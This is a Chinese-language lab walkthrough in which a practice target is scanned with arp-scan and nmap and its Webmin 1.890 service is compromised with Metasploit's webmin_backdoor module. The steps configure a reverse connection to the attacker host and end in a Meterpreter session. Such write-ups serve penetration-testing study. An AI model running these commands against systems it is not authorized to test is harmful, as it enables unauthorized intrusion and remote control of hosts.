目录
主机发现
靶机窗口
确认靶机和攻击机在一个网段
信息收集
攻击机扫描当前网段的主机
sudo arp-scan -l
mac地址后两位4e8e靶机的ip地址就是10.4.7.135了
看下都开放了那些端口
sudo nmap -sS -sV -A -n 10.4.7.135
端口信息:
22:端口:ssh服务,OpenSSH的版本是7.6pl,其中的"pl"表示它是一个修订版本。是Ubuntu Linux发行的第四个修订版本。
1000端口:http服务,Miniserv 1.890,它是Webmin的一个组件,用于管理Webmin的网络服务。
去访问下它的网页
看到了webmin
直接使用msf
搜索一下webmin都有那些漏洞然后进行配置利用。
漏洞利用
msfconsole
查看漏洞信息
search webmin
这是一个19年8月10号发现的安全漏洞
webmin_backdoor:这个特定的后门漏洞可能允许攻击者在未经授权的情况下访问Webmin管理界面或执行其他恶意操作
password_change.cgi:这是指Webmin管理工具中的一个特定的CGI脚本,用于更改用户密码。该漏洞可能使攻击者能够利用漏洞修改用户密码或执行其他未经授权的操作。
选中这个漏洞
use 7 或 use exploit/linux/http/webmin_backdoor
配置利用(这边的srvhost和lhost是kali的ip,打错了QAQ)
set rhosts 10.4.7.135
set srvhost 10.4.7.130
set lhost 10.4.7.130
show targets
set rhosts 10.4.7.135:这将目标主机的IP地址设置为10.4.7.135。这是指定你要攻击的目标主机。
set srvhost 10.4.7.130: 这将监听地址设置为10.4.7.130。在这里,你正在告诉Metasploit要在哪个IP地址上监听来自受害者主机的连接。
set lhost 10.4.7.130: 这将回连地址设置为10.4.7.130。这是告诉Metasploit在成功利用漏洞后与你的主机建立反向连接的地址。
show targets 这是用来显示该漏洞的可利用目标。在这种情况下,显示了两个可利用标:Automatic(unix In-Memorv)和Automatic(Linux Dropper)。
通过这些设置,已经准备好利用Webmin后门漏洞,并且在成功利用后与目标主机建立反向连接。
set ssl true: 这个命令将SSL选项设置为true,这意味着Metasploit将使用SSL
set forceexploit true: 这个命令将强制利用(exploit)设置为true
exploit: 这个命令实际执行了渗透测试的攻击步骤
set target 1: 用于设置攻击目标
exploit:攻击
成功进入Meterpreter是Metasploit框架中的一种强大的后门载荷(payload),用于在受害主机上建立持久性访问、执行远程命令和操纵受感染系统的功能。